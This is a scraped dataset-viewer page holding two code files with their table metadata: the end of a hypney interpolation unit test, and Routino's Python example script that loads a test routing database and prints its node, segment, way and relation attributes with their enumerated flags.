# values.requires_grad_(True)
#
# X, Y = np.meshgrid(np.arange(-.5, 2, .19), np.arange(-.5, 2, .19))
# points_to_interp = [torch.from_numpy(
# X.flatten()).float(), torch.from_numpy(Y.flatten()).float()]
#
# def f(values):
# return torch_interpolations.RegularGridInterpolator(
# points, values)(points_to_interp)
#
# torch.autograd.gradcheck(f, (values,), eps=1e-5, atol=1e-1, rtol=1e-1)
def test_interpolator_builder():
itp = hypney.utils.interpolation.InterpolatorBuilder([(-1, 0, 1)])
def scalar_f(z):
return z[0]
z = ep.astensor(np.array([1, 0, -1, 0, 1, 1, -1]))
scalar_itp = itp.make_interpolator(scalar_f)
np.testing.assert_array_equal(scalar_itp(z).numpy(), z.numpy())
def matrix_f(z):
return ep.astensor(np.ones((2, 2)) * z[0])
matrix_itp = itp.make_interpolator(matrix_f)
np.testing.assert_array_equal(
matrix_itp(z).numpy(), z[:, None, None].numpy() * np.ones((1, 2, 2))
)
# What happened here? Does the test not make sense or did the API change?
# np.testing.assert_array_equal(
# matrix_itp(ep.numpy.array([0, 0, 0])).numpy(),
# np.ones((2, 2)))
| 33.564103 | 137 | 0.632544 | 394 | 2,618 | 4.081218 | 0.266497 | 0.00995 | 0.052239 | 0.024876 | 0.214552 | 0.143657 | 0.126866 | 0.032338 | 0 | 0 | 0 | 0.040566 | 0.190222 | 2,618 | 77 | 138 | 34 | 0.717925 | 0.399924 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012987 | 0.088235 | 1 | 0.117647 | false | 0 | 0.117647 | 0.058824 | 0.294118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fe12a816ae34998a3fcf2329f909ed39bda660d | 8,451 | py | Python | python/database.py | bvmeggelen/routino | b6bcc47be6ba4a90353a5b140ca9996aaa17d2b8 | [
"X11",
"MIT"
] | 1 | 2016-02-12T20:26:31.000Z | 2016-02-12T20:26:31.000Z | python/database.py | bvmeggelen/routino | b6bcc47be6ba4a90353a5b140ca9996aaa17d2b8 | [
"X11",
"MIT"
] | 2 | 2019-01-16T10:00:19.000Z | 2019-02-03T10:53:32.000Z | python/database.py | bvmeggelen/routino | b6bcc47be6ba4a90353a5b140ca9996aaa17d2b8 | [
"X11",
"MIT"
] | null | null | null | #!/usr/bin/python3
##########################################
# Routino database access from Python.
#
# Part of the Routino routing software.
##########################################
# This file Copyright 2018 Andrew M. Bishop
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
##########################################
import routino.database
# Database, access all attributes
database = routino.database.LoadDatabase("../../src/test/fat", "turns")
if database is None:
database = routino.database.LoadDatabase("../src/test/fat", "turns")
if database is None:
print("Failed to load database")
exit(1)
print(database)
database_attrs = ['nnodes', 'nsegments', 'nways', 'nrelations']
for attr in database_attrs:
print(" Attribute: " + attr + " =", getattr(database, attr))
print("")
# A single node, access all attributes and all functions
node=database.GetNode(0)
print("1st node =", node)
node_attrs = ['id', 'firstsegment', 'latitude', 'longitude', 'allow', 'flags']
node_infos = ['', '', 'degrees', 'degrees', '[note 1]', '[note 2]']
for attr,info in zip(node_attrs,node_infos):
print(" Attribute: " + attr + " =", getattr(node, attr), info)
segments = node.Segments()
print(" Function: " + "Segments()" + " = [" + ", ".join([str(segments[x]) for x in range(len(segments))]) + "]")
print("")
# A single segment, access all attributes and all functions
segment=database.GetSegment(0)
print("1st segment =", segment)
segment_attrs = ['id', 'node1', 'node2', 'next2', 'way', 'distance', 'flags']
segment_infos = ['', '', '', '', '', 'km', '[note 3]']
for attr,info in zip(segment_attrs,segment_infos):
print(" Attribute: " + attr + " =", getattr(segment, attr), info)
print(" Function: " + "Node1()" + " = " + str(segment.Node1()))
print(" Function: " + "Node2()" + " = " + str(segment.Node2()))
print(" Function: " + "Way()" + " = " + str(segment.Way()))
print("")
# A single way, access all attributes and all functions
way=database.GetWay(0)
print("1st way =", way)
way_attrs = ['id', 'name', 'allow', 'type', 'props', 'speed', 'weight', 'height', 'width', 'length']
way_infos = ['', '', '[note 1]', '[note 4]', '[note 5]', 'km/hr [note 6]', 'tonnes [note 6]', 'metres [note 6]', 'metres [note 6]', 'metres [note 6]']
for attr,info in zip(way_attrs,way_infos):
print(" Attribute: " + attr + " =", getattr(way, attr), info)
print("")
# A single relation, access all attributes and all functions
relation=database.GetRelation(0)
print("1st relation =", relation)
relation_attrs = ['id', 'from_seg', 'via_node', 'to_seg', 'from_way', 'to_way', 'from_node', 'to_node', 'except_transport']
relation_infos = ['', '', '', '', '', '', '', '', '[note 7]']
for attr,info in zip(relation_attrs,relation_infos):
print(" Attribute: " + attr + " =", getattr(relation, attr), info)
print(" Function: " + "FromSegment()" + " = " + str(relation.FromSegment()))
print(" Function: " + "ViaNode()" + " = " + str(relation.ViaNode()))
print(" Function: " + "ToSegment()" + " = " + str(relation.ToSegment()))
print(" Function: " + "FromWay()" + " = " + str(relation.FromWay()))
print(" Function: " + "ToWay()" + " = " + str(relation.ToWay()))
print(" Function: " + "FromNode()" + " = " + str(relation.FromNode()))
print(" Function: " + "ToNode()" + " = " + str(relation.ToNode()))
print("")
# The list of nodes as a list and an iterable (just the first 4)
nodes=database.Nodes()
print("len(database.Nodes()) = " + str(len(nodes)))
print("database.Nodes() = [" + ", ".join([str(nodes[x]) for x in range(4)]) + ", ...]")
for node in nodes:
if node.id == 4:
break
print(node)
print("")
# The list of segments as a list and an iterable (just the first 4)
segments=database.Segments()
print("len(database.Segments()) = " + str(len(segments)))
print("database.Segments() = [" + ", ".join([str(segments[x]) for x in range(4)]) + ", ...]")
for segment in segments:
if segment.id == 4:
break
print(segment)
print("")
# The list of ways as a list and an iterable (just the first 4)
ways=database.Ways()
print("len(database.Ways()) = " + str(len(ways)))
print("database.Ways() = [" + ", ".join([str(ways[x]) for x in range(4)]) + ", ...]")
for way in ways:
if way.id == 4:
break
print(way)
print("")
# The list of relations as a list and an iterable (just the first 4)
relations=database.Relations()
print("len(database.Relations()) = " + str(len(relations)))
print("database.Relations() = [" + ", ".join([str(relations[x]) for x in range(4)]) + ", ...]")
for relation in relations:
if relation.id == 4:
break
print(relation)
print("")
# Enumerated lists
transports_enum = ["Transports_None",
"Transports_Foot",
"Transports_Horse",
"Transports_Wheelchair",
"Transports_Bicycle",
"Transports_Moped",
"Transports_Motorcycle",
"Transports_Motorcar",
"Transports_Goods",
"Transports_HGV",
"Transports_PSV",
"Transports_ALL"]
nodeflags_enum = ["Nodeflag_Super",
"Nodeflag_U_Turn",
"Nodeflag_Mini_Roundabout",
"Nodeflag_Turn_Restrict",
"Nodeflag_Turn_Restrict2"]
segmentflags_enum = ["Segmentflag_Area",
"Segmentflag_Oneway_1to2",
"Segmentflag_Oneway_2to1",
"Segmentflag_Super",
"Segmentflag_Normal"]
properties_enum = ["Properties_None",
"Properties_Paved",
"Properties_Multilane",
"Properties_Bridge",
"Properties_Tunnel",
"Properties_FootRoute",
"Properties_BicycleRoute",
"Properties_ALL"]
highway_enum = ["Highway_Motorway",
"Highway_Trunk",
"Highway_Primary",
"Highway_Secondary",
"Highway_Tertiary",
"Highway_Unclassified",
"Highway_Residential",
"Highway_Service",
"Highway_Track",
"Highway_Cycleway",
"Highway_Path",
"Highway_Steps",
"Highway_Ferry",
"Highway_Count",
"Highway_CycleBothWays",
"Highway_OneWay",
"Highway_Roundabout",
"Highway_Area"]
def print_enum(list):
for item in list:
print(" routino.database."+item)
print("Note 1: The Node's and Way's 'allow' parameter can be the combination of these enumerated values:")
print_enum(transports_enum)
print("")
print("Note 2: The Node's 'flags' parameter can be the combination of these enumerated values:")
print_enum(nodeflags_enum)
print("")
print("Note 3: The Segment's 'flags' parameter can be the combination of these enumerated values:")
print_enum(segmentflags_enum)
print("")
print("Note 4: The Way's 'type' parameter can be one the combination of these enumerated values:")
print_enum(highway_enum)
print("")
print("Note 5: The Way's 'props' parameter can be the combination of these enumerated values:")
print_enum(properties_enum)
print("")
print("Note 6: A value of zero for a Way's speed, weight, height, width or length means that there is no limit.")
print("")
print("Note 7: The Relation's 'except_transport' parameter can be the combination of these enumerated values:")
print_enum(transports_enum)
print("")
import gc
gc.collect()
| 30.956044 | 156 | 0.587504 | 964 | 8,451 | 5.047718 | 0.254149 | 0.029388 | 0.017263 | 0.025894 | 0.254829 | 0.217016 | 0.182491 | 0.15783 | 0.140567 | 0.126182 | 0 | 0.009107 | 0.246361 | 8,451 | 272 | 157 | 31.069853 | 0.754907 | 0.153591 | 0 | 0.152866 | 0 | 0.019108 | 0.363481 | 0.03872 | 0 | 0 | 0 | 0 | 0 | 1 | 0.006369 | false | 0 | 0.012739 | 0 | 0.019108 | 0.414013 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.